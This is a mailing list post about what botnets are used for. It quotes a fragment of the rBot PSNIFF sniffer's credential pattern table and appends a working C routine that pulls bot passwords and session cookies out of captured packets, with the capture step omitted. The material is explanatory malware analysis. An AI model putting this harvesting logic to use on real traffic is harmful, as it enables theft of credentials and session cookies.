On Fri, 30 Jan 2009 11:40:12 -0700 Thomas Coppi <thisnuke...@gmail.com> wrote:
> On Wed, Jan 28, 2009 at 2:19 PM, John Levine <jo...@iecc.com> wrote:
> > Indeed. And don't forget that through the magic of botnets, the bad
> > guys have vastly more compute power available than the good guys.
>
> Just out of curiosity, does anyone happen to know of any documented
> examples of a botnet being used for something more interesting than
> just sending spam or DDoS?

I asked Rob Thomas of Team Cymru this question (he and they study the
underground). Here is his answer, posted with permission:

====

Botnets are routinely used as:

1. Proxies (IRC, HTTP & HTTPS)

2. To recover financial credentials, e.g. paypal, citibank, et al. This
was the original purpose of the PSNIFF code in some of the early bots.
Here's a code snippet from the now venerable
rBot_rxbot_041504-dcom-priv-OPTIX_MASTERPASSWORD dating back several
years:

[ ... ]

// Scaled down distributed network raw packet sniffer (ala Carnivore)
//
// When activated, watches for botnet login strings, and
// reports them when found.
//
// The bot's NIC must be configured for promiscuous mode (receive
// all). Chances are this is already done; if not, you can enable it
// by passing the SIO_RCVALL* DWORD option with a value of 1. To
// disable promiscuous mode, pass it with value 0.
//
// This won't work on Win9x bots since SIO_RCVALL needs raw
// socket support which only WinNT+ has.

[ ... ]

PSWORDS pswords[]={
    {":.login",BOTP},
    {":,login",BOTP},
    {":!login",BOTP},
[ ... ]
    {"paypal",HTTPP},
    {"PAYPAL",HTTPP},
    {"paypal.com",HTTPP},
    {"PAYPAL.COM",HTTPP},
    {"Set-Cookie:",HTTPP},
    {NULL,0}
};

[ ... ]

3. Remember they're called "boats" now, so anything is possible.
Screen captures are becoming increasingly popular.

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majord...@metzdowd.com
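The snippet above shows only the pattern table; the matching logic that turns a captured packet into a "reported" credential is elided. The following is an added, stand-alone model of that step, written for this page and not taken from the rBot source or from Rob Thomas's message. It assumes the tag values for BOTP/HTTPP (the original header defining them is not quoted), uses only the table rows visible above, and reports the remainder of the line after a match (the bot password after ":.login", the header value after "Set-Cookie:"). The raw-socket capture itself (SIO_RCVALL on WinNT) is Windows-specific and not reproduced; the sample payloads are constructed.

```c
/* Model of the PSNIFF matching step: scan a captured TCP payload for
 * the strings in a pswords[]-style table and extract what follows.
 * Added example; not the rBot code. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Tag values are an assumption; the original bot header is not quoted. */
enum { NONE = 0, BOTP = 1, HTTPP = 2 };

typedef struct {
    const char *pattern;
    int type;
} PSWORD;

/* Only the rows quoted on the page; the rows under "[ ... ]" are unknown. */
static const PSWORD pswords[] = {
    {":.login", BOTP},
    {":,login", BOTP},
    {":!login", BOTP},
    {"paypal", HTTPP},
    {"PAYPAL", HTTPP},
    {"paypal.com", HTTPP},
    {"PAYPAL.COM", HTTPP},
    {"Set-Cookie:", HTTPP},
    {NULL, 0}
};

/* Scan payload[0..len) for the first table entry that occurs in it.
 * On a match, copy the rest of that line (leading spaces skipped,
 * stopped at CR/LF) into out and return the entry's type; otherwise
 * return NONE with out emptied. len bounds every read, so a capture
 * that is not NUL-terminated cannot run the scan off the buffer. */
int psniff_classify(const unsigned char *payload, size_t len,
                    char *out, size_t outsz)
{
    if (outsz) out[0] = '\0';
    for (const PSWORD *p = pswords; p->pattern; p++) {
        size_t plen = strlen(p->pattern);
        if (plen > len) continue;
        for (size_t i = 0; i + plen <= len; i++) {
            if (memcmp(payload + i, p->pattern, plen) != 0) continue;
            size_t j = i + plen;
            while (j < len && payload[j] == ' ') j++;
            size_t k = 0;
            while (j < len && payload[j] != '\r' && payload[j] != '\n'
                   && k + 1 < outsz)
                out[k++] = (char)payload[j++];
            if (outsz) out[k] = '\0';
            return p->type;
        }
    }
    return NONE;
}

/* Convenience wrapper for NUL-terminated sample captures. */
int psniff_classify_str(const char *capture, char *out, size_t outsz)
{
    return psniff_classify((const unsigned char *)capture,
                           strlen(capture), out, outsz);
}

int main(void)
{
    /* Constructed sample captures, not real traffic. */
    const char *samples[] = {
        ":nick!u@h PRIVMSG #c :.login s3cret\r\n",           /* IRC bot login */
        "GET / HTTP/1.1\r\nHost: www.paypal.com\r\n\r\n",      /* HTTP request */
        "HTTP/1.1 200 OK\r\nSet-Cookie: session=abc123; Path=/\r\n",
        "GET /index.html HTTP/1.1\r\nHost: example.org\r\n\r\n" /* no match */
    };
    char out[128];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int t = psniff_classify_str(samples[i], out, sizeof out);
        printf("sample %zu: type=%d reported=\"%s\"\n", i, t, out);
    }
    return 0;
}
```

Note the ordering effect: because "paypal" precedes "paypal.com" in the table, a Host header matches the shorter pattern first and only ".com" is reported, which is one reason sniffers of this kind tend to forward the whole packet rather than a parsed field.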